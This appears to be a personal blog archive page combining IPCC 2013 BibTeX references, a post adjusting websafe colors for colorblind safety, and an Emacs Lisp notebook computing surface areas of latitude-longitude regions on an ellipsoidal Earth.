   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {TS},
   pages = {33–115},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.005},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCIntroductionCubash2013,
   author = {Cubasch, U. and Wuebbles, D. and Chen, D. and Facchini, M.C. and Frame, D. and Mahowald, N. and Winther, J.-G.},
   title = {Introduction},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {1},
   pages = {119–158},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.007},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCObservationsAtmosphereSurfaceHartmann2013,
   author = {Hartmann, D.L. and Klein Tank, A.M.G. and Rusticucci, M. and Alexander, L.V. and Br\"onnimann, S. and Charabi, Y. and Dentener, F.J. and Dlugokencky, E.J. and Easterling, D.R. and Kaplan, A. and Soden, B.J. and Thorne, P.W. and Wild, M. and Zhai, P.M.},
   title = {Observations: Atmosphere and Surface},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {2},
   pages = {159–254},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.008},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCObservationsOceanRhein2013,
   author = {Rhein, M. and Rintoul, S.R. and Aoki, S. and Campos, E. and Chambers, D. and Feely, R.A. and Gulev, S. and Johnson, G.C. and Josey, S.A. and Kostianoy, A. and Mauritzen, C. and Roemmich, D. and Talley, L.D. and Wang, F.},
   title = {Observations: Ocean},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {3},
   pages = {255–316},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.010},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCObservationsCryosphereVaughan2013,
   author = {Vaughan, D.G. and Comiso, J.C. and Allison, I. and Carrasco, J. and Kaser, G. and Kwok, R. and Mote, P. and Murray, T. and Paul, F. and Ren, J. and Rignot, E. and Solomina, O. and Steffen, K. and Zhang, T.},
   title = {Observations: Cryosphere},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {4},
   pages = {317–382},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.012},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCPaleoclimateArchivesMasson-Delmotte2013,
   author = {Masson-Delmotte, V. and Schulz, M. and Abe-Ouchi, A. and Beer, J. and Ganopolski, A. and González Rouco, J.F. and Jansen, E. and Lambeck, K. and Luterbacher, J. and Naish, T. and Osborn, T. and Otto-Bliesner, B. and Quinn, T. and Ramesh, R. and Rojas, M. and Shao, X. and Timmermann, A.},
   title = {Information from Paleoclimate Archives},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {5},
   pages = {383–464},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.013},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCCarbonCycleAndOthersCiais2013,
   author = {Ciais, P. and Sabine, C. and Bala, G. and Bopp, L. and Brovkin, V. and Canadell, J. and Chhabra, A. and DeFries, R. and Galloway, J. and Heimann, M. and Jones, C. and Le Quéré, C. and Myneni, R.B. and Piao, S. and Thornton, P.},
   title = {Carbon and Other Biogeochemical Cycles},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {6},
   pages = {465–570},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.015},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCCloudsAeorosolsBoucher2013,
   author = {Boucher, O. and Randall, D. and Artaxo, P. and Bretherton, C. and Feingold, G. and Forster, P. and Kerminen, V.-M. and Kondo, Y. and Liao, H. and Lohmann, U. and Rasch, P. and Satheesh, S.K. and Sherwood, S. and Stevens, B. and Zhang, X.Y.},
   title = {Clouds and Aerosols},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {7},
   pages = {571–658},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.016},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCRadiativeForcingMyhre2013,
   author = {Myhre, G. and Shindell, D. and Bréon, F.-M. and Collins, W. and Fuglestvedt, J. and Huang, J. and Koch, D. and Lamarque, J.-F. and Lee, D. and Mendoza, B. and Nakajima, T. and Robock, A. and Stephens, G. and Takemura, T. and Zhang, H.},
   title = {Anthropogenic and Natural Radiative Forcing},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {8},
   pages = {659–740},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.018},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCClimateModelsFlato2013,
   author = {Flato, G. and Marotzke, J. and Abiodun, B. and Braconnot, P. and Chou, S.C. and Collins, W. and Cox, P. and Driouech, F. and Emori, S. and Eyring, V. and Forest, C. and Gleckler, P. and Guilyardi, E. and Jakob, C. and Kattsov, V. and Reason, C. and Rummukainen, M.},
   title = {Evaluation of Climate Models},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {9},
   pages = {741–866},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.020},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCDetectionAttributionBindoff2013,
   author = {Bindoff, N.L. and Stott, P.A. and AchutaRao, K.M. and Allen, M.R. and Gillett, N. and Gutzler, D. and Hansingo, K. and Hegerl, G. and Hu, Y. and Jain, S. and Mokhov, I.I. and Overland, J. and Perlwitz, J. and Sebbari, R. and Zhang, X.},
   title = {Detection and Attribution of Climate Change: from Global to Regional},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {10},
   pages = {867–952},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.022},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCNeartermProjectionsKirtman2013,
   author = {Kirtman, B. and Power, S.B. and Adedoyin, J.A. and Boer, G.J. and Bojariu, R. and Camilloni, I. and Doblas-Reyes, F.J. and Fiore, A.M. and Kimoto, M. and Meehl, G.A. and Prather, M. and Sarr, A. and Schär, C. and Sutton, R. and van Oldenborgh, G.J. and Vecchi, G. and Wang, H.J.},
   title = {Near-term Climate Change: Projections and Predictability},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {11},
   pages = {953–1028},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.023},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCLongtermProjectionsCollins2013,
   author = {Collins, M. and Knutti, R. and Arblaster, J. and Dufresne, J.-L. and Fichefet, T. and Friedlingstein, P. and Gao, X. and Gutowski, W.J. and Johns, T. and Krinner, G. and Shongwe, M. and Tebaldi, C. and Weaver, A.J. and Wehner, M.},
   title = {Long-term Climate Change: Projections, Commitments and Irreversibility},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {12},
   pages = {1029–1136},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.024},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCSeaLevelChurch2013,
   author = {Church, J.A. and Clark, P.U. and Cazenave, A. and Gregory, J.M. and Jevrejeva, S. and Levermann, A. and Merrifield, M.A. and Milne, G.A. and Nerem, R.S. and Nunn, P.D. and Payne, A.J. and Pfeffer, W.T. and Stammer, D. and Unnikrishnan, A.S.},
   title = {Sea Level Change},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {13},
   pages = {1137–1216},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.026},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCClimatePhenomenaChristensen2013,
   author = {Christensen, J.H. and Krishna Kumar, K. and Aldrian, E. and An, S.-I. and Cavalcanti, I.F.A. and de Castro, M. and Dong, W. and Goswami, P. and Hall, A. and Kanyanga, J.K. and Kitoh, A. and Kossin, J. and Lau, N.-C. and Renwick, J. and Stephenson, D.B. and Xie, S.-P. and Zhou, T.},
   title = {Climate Phenomena and their Relevance for Future Regional Climate Change},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {14},
   pages = {1217–1308},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.028},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex1projectionsStocker2013,
   author = {IPCC},
   title = {Annex I: Atlas of Global and Regional Climate Projections },
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AI},
   pages = {1311–1394},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.029},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex2scenariosStocker2013,
   author = {IPCC},
   title = {Annex II: Climate System Scenario Tables },
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AII},
   pages = {1395–1446},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.030},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex3glossaryStocker2013,
   author = {IPCC},
   title = {Annex III: Glossary},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AIII},
   pages = {1447–1466},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.031},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex4acronymsStocker2013,
   author = {IPCC},
   title = {Annex IV: Acronyms},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AIV},
   pages = {1467–1476},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex5contributorsStocker2013,
   author = {IPCC},
   title = {Annex V: Contributors to the IPCC WGI Fifth Assessment Report},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AV},
   pages = {1477–1496},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex6reviewersStocker2013,
   author = {IPCC},
   title = {Annex VI: Expert Reviewers of the IPCC WGI Fifth Assessment Report},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AVI},
   pages = {1497–1522},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCIndexStocker2013,
   author = {IPCC},
   title = {Index},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {Index},
   pages = {1523–1535},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

  1. For IPCC 2013 WG1 they finally provide BibTeX in their zip of references, but without item headers, so you cannot use these entries directly.

Making websafe colors safe for colorblind people

I just made the colors of my plotting framework safe for colorblind people (thanks to Paul Tol’s notes) and I want to share a very nice result I got: How to make the really websafe colors safe for colorblind people with minimal changes.

Screenshots: “mostly websafe and colorblindsafe” vs. “websafe but NOT colorblind safe”

(the colorblind-safe colors are on the left, the original websafe colors on the right)

To do so, I turned to Color Oracle (for simulation of colorblindness directly on my screen) and Emacs rainbow-mode (for seeing the colors while editing the hex-codes - as shown in the screenshots above) and tweaked the color codes bit by bit, until they were distinguishable in the simulation of Deuteranopia, Protanopia and Tritanopia.

The result was the following color codes:

silver  #c0c0c0
gray    #808080
black   #000000
red     #ff0000
maroon  #800000
yellow  #ffff00
olive   #707030
lime    #00ee00
green   #009000
aqua    #00eeee
teal    #00a0a0
blue    #0000ff
navy    #000080
fuchsia #ff00ff
purple  #900090

The changes in detail:

- olive = "#808000"
+ olive = "#707030"

- lime = "#00ff00"
+ lime = "#00ee00"

- aqua = "#00ffff"
+ aqua = "#00eeee"

- green = "#008000"
+ green = "#009000"

- teal = "#008080"
+ teal = "#00a0a0"

- purple = "#800080"
+ purple = "#900090"

Unchanged colors: Silver, Gray, Black, Red, Maroon, Yellow, Blue, Navy, Fuchsia (and naturally White).

Caveat: Naturally this change makes the colors less websafe, but they stay close to their counterparts, so simple designs which use these colors can be adjusted without disrupting the visual appearance. The change also provides a nice, small rainbow-color palette which works for colorblind people; I use it for coloring lines and symbols in plots. Not being safe for colorblind people is a sad design failure of the websafe colors, and as such of displays in general, because as this article shows, a small adjustment would have made them safe for colorblind people. In an ideal world, the browser developers would now come together and decide on a standard for displaying these colors, so that they also become completely websafe. In the non-ideal world we live in, I’ll just specify the colors by hexcode, because accessibility trumps design.
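For illustration, here is a minimal sketch (Python with matplotlib, not the plotting framework mentioned above) of using these colors as the default color cycle for lines and symbols:

# the colorblind-adjusted websafe palette from the list above
import matplotlib.pyplot as plt
from cycler import cycler

COLORBLIND_SAFE_WEBSAFE = {
    "silver": "#c0c0c0", "gray": "#808080", "black": "#000000",
    "red": "#ff0000", "maroon": "#800000", "yellow": "#ffff00",
    "olive": "#707030", "lime": "#00ee00", "green": "#009000",
    "aqua": "#00eeee", "teal": "#00a0a0", "blue": "#0000ff",
    "navy": "#000080", "fuchsia": "#ff00ff", "purple": "#900090",
}

# use the adjusted colors for all following plots
plt.rc("axes", prop_cycle=cycler(color=list(COLORBLIND_SAFE_WEBSAFE.values())))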

Disclaimer: I’m not a usability or accessibility expert. I just do what I can to make my works accessible to people. If you find errors in this article or want to suggest improvements, please contact me.

Attachment (size):
websafe-colorblind-safe.png (14.65 KB)
websafe-not-colorblindsafe.png (14.51 KB)

Surface Area of regions on an ellipsoid Earth

PDF

PDF (to print)

Org (source)

Data (netCDF4)

Calculating the area of arbitrary regions on the Earth approximated as an ellipsoid. I needed this for conversion between the output of different models.

It’s calculated in Emacs Lisp, which showed me that for somewhat complex mathematical tasks Lisp syntax isn’t only unproblematic, but actually helps avoid mistakes. And full unicode support is great for implementing algorithms with ω, λ and φ.

eartharea_1x1.png

1 Intro

For converting between fluxes and emissions I need the area of arbitrary regions made up of longitude×latitude pixels - specifically the transcom regions.

But the Earth is not an exact sphere, but rather an oblate spheroid. I need to estimate how precisely I have to calculate to keep the representation errors of the regions insignificant compared to the uncertainties of the fluxes I work with.

2 Theory

http://de.wikipedia.org/wiki/Erdfigur http://de.wikipedia.org/wiki/Erdellipsoid

“As a result, the sea level approximately takes the shape of an ellipsoid of revolution whose semi-axes (radii) differ by 21.38 km (a = 6378.139 ± 0.003 km, b = 6356.752 km)” (translated)

\begin{equation} f = \frac{a-b}{a} = 1:298.25642 \pm 0.00001 \end{equation}

IERS Conventions (2003).
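As a quick consistency check, the polar radius follows from the equatorial radius and the flattening:

\begin{equation} b = a (1 - f) = 6378.139~km \cdot \left(1 - \frac{1}{298.25642}\right) \approx 6356.75~km \end{equation}

which matches the quoted difference of 21.38 km between the semi-axes.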

2.1 Estimating Errors due to spherical approximation

To estimate the errors, just calculate the area of a few samples with different latitude and compare them.

Latitudes

  • lat 0°
  • lat 10°
  • lat 30°
  • lat 60°
  • lat 85°

Area-Sidelength:

  • 0.1°

2.1.1 Spherical

The simplest case for the latitude-longitude rectangle with longitude θ, latitude φ and earth radius \( R \) looks in linear approximation like this:

segmentsphere.png

Using a cylindrical equal area rectangle projection (Lambert) we can calculate the area of a given latitude-longitude square as follows:

\begin{equation} A = \left(\frac{2 \pi R}{360}\right)^2 \Delta\theta \, \Delta\varphi \, \cos \varphi \end{equation}

With θ as longitude, φ as latitude, Δθ and Δφ as the sidelengths in degrees and \( R \) as radius of the earth sphere.

For a 1°×1° square at the equator that equals roughly 12364 \(km^2\) (see Table 1):

(defun spherecutarea (latdeg sidelength deglen)
  "Calculate the area of a cut in a sphere at the latitude LATDEG
with the given SIDELENGTH and the length of one degree at the
Equator DEGLEN."
  (* deglen sidelength ; longitude 
     deglen sidelength (cos (* 2 float-pi (/ latdeg 360.0))))) ; latitude

(defun spherearea (latdeg sidelength)
  "Area of a segment of a sphere at LATDEG with the given
SIDELENGTH."
  (let* ((R 6371.0) ; km
         (deglen (/ (* 2 float-pi R) 360.0))) ; km per degree
    (spherecutarea latdeg sidelength deglen)))
Table 1: Area of lat-lon “square” with the given sidelength as degree in \(km^2\)

| latitude ↓ \ sidelength → |   0.1° |       1° |        4° |
|---------------------------+--------+----------+-----------|
|                         0 | 123.64 | 12364.31 | 197828.99 |
|                        10 | 121.76 | 12176.47 | 194823.52 |
|                        30 | 107.08 | 10707.81 | 171324.93 |
|                        60 |  61.82 |  6182.16 |  98914.49 |
|                        85 |  10.78 |  1077.62 |  17241.93 |

(defun spheresegmentarea (latdeg sidelength)
  "Calculate the area of a rectangular segment on a sphere at
latitude LATDEG with the given SIDELENGTH."
  (* 24728.6234228 sidelength sidelength 
     (cos (* float-pi (/ latdeg 180.0)))))
spheresegmentarea

2.2 Simple ellipsoid integral (scrapped)

Instead of the very simple spherical compression, we can use integration over the area of an oblate spheroid, or more exactly: an ellipsoid of revolution.

An oblate spheroid has one short axis and two long axes. For the Earth, the short axis is the polar radius \( b = 6356.752~km \), while the long axes have the length of the equatorial radius \( a = 6378.139 \pm 0.003~km \).

Thus the linear approximation of an area on the spheroid looks like this:

segmentellipsoid.png

Let’s scrap that. I’m drowning in not-so-simple ideas, so I’d rather take a pre-generated formula, even if it means cutting leaves with a chainsaw. Let’s go to an astronomy book: Astronomische Algorithmen by Jean Meeus has a formula for distances on an ellipsoid.

2.3 Square approximation with ellipsoid sidelength calculation

Taking the algorithm from Astronomische Algorithmen rev. 2 by Jean Meeus. I want to know how big the errors are when I just assume a sphere. So let’s implement a fitting algorithm.

The following algorithm gives us the distance between two points.

\begin{equation} F = \frac{\phi_1 + \phi_2}{2}, \quad G = \frac{\phi_1 - \phi_2}{2}, \quad \lambda = \frac{L_1 - L_2}{2} \end{equation}
\begin{equation} S = \sin^2 G \, \cos^2 \lambda + \cos^2 F \, \sin^2 \lambda \end{equation}
\begin{equation} C = \cos^2 G \, \cos^2 \lambda + \sin^2 F \, \sin^2 \lambda \end{equation}
\begin{equation} \tan \omega = \sqrt{\frac{S}{C}} \end{equation}
\begin{equation} R = \frac{\sqrt{SC}}{\omega}, \quad \omega ~ \text{in radians} \end{equation}
\begin{equation} D = 2 \omega a \end{equation}
\begin{equation} H_1 = \frac{3R - 1}{2C}, \quad H_2 = \frac{3R + 1}{2S} \end{equation}
\begin{equation} s = D(1 + f H_1 \sin^2 F \, \cos^2 G - f H_2 \cos^2 F \, \sin^2 G) \end{equation}

We can now use the distance \( s \) between the 4 corners of a pseudo-rectangular area on the ellipsoid to approximate the area of the pseudo-square they delimit.

\begin{equation} A = \frac{s_{bottomright - bottomleft} + s_{topright - topleft}}{2} \cdot s_{topleft - bottomleft} \end{equation}

segmentellipsoiddistances.png

But by doing so we treat the non-linear problem as linear. To minimize the error, we can split an area into many smaller areas and sum up their areas (numerical approximation).

In the following we will use the direct algorithm as well as the numerical approximation.

2.3.1 Code

(defmacro turntofloatsingle (var)
  (list 'setq var (list 'float var)))

(defmacro turntofloat (&rest vars)
  "Turn a list of items to floats."
  (cons 'progn (mapcar 
                (lambda (var) 
                  (list 'turntofloatsingle var))
                vars)))
(defun ellipsoiddistance (a f L1 L2 φ1 φ2)
  "Calculate the distance of two arbitrary points on an ellipsoid.

  Parameters: Equator radius A, oblateness F and for point 1 and
  2 respectively the longitudes L1 and L2 and the latitudes φ1
  and φ2."
  ; ensure that we work on floats
  (turntofloat a f φ1 φ2 L1 L2)
  ; the first simplifications don’t depend on each other, 
  ; so we just use let to bind them
  (let ((F (/ (+ φ1 φ2) 2))
        (G (/ (- φ1 φ2) 2))
        (λ (/ (- L1 L2) 2)))
    (message (format "F %f G %f λ %f a %f f %f L1 %f L2 %f φ1 %f φ2 %f" 
                     F G λ a f L1 L2 φ1 φ2))
    ; the second don’t depend on each other either
    (let ((S (+ (* (expt (sin G) 2)
                   (expt (cos λ) 2))
                (* (expt (cos F) 2)
                   (expt (sin λ) 2))))
          (C (+ (* (expt (cos G) 2)
                   (expt (cos λ) 2))        
                (* (expt (sin F) 2)
                   (expt (sin λ) 2)))))
      ; now we have a few consecutive definitions, so we use let*
      ; which allows references to previous elements in the same let*.
      (let* ((ω (atan (sqrt (/ S C))))
             (R (/    (sqrt (* S C)) ω)))
        (let ((D (* 2 ω a))
              ;; Meeus: H1 = (3R - 1)/(2C), H2 = (3R + 1)/(2S)
              (H1 (/ (- (* 3 R) 1) (* 2 C)))
              (H2 (/ (+ (* 3 R) 1) (* 2 S))))
          ; All prepared. Now we just fit all this together. This is
          ; the last line, so the function returns the value.
          (* D (- 
                (+ 1 (* f H1 (expt (sin F) 2) (expt (cos G) 2)))
                (* f H2 (expt (cos F) 2) (expt (sin G) 2)))))))))
(defun ellipsoidrectanglearea (a f longitude latitude dlon dlat)
  (let ((L1 longitude)
        (L2 (+ longitude dlon))
        (φ1 latitude)
        (φ2 (+ latitude dlat)))
    (let ((lenlower (ellipsoiddistance a f L1 L2 φ1 φ1))
          (lenupper (ellipsoiddistance a f L1 L2 φ2 φ2))
          (lenwestern (ellipsoiddistance a f L1 L1 φ1 φ2))
          (leneastern (ellipsoiddistance a f L2 L2 φ1 φ2)))
      (if (not (= lenwestern leneastern))
          (error "Western and Eastern length are not equal. 
This violates the laws of geometry. We die. Western: %f Eastern: %f" 
                 lenwestern leneastern))
      (let ((horizontalmean (/ (+ lenlower lenupper) 2)))
        ; now just return length times width
        (* horizontalmean lenwestern)))))
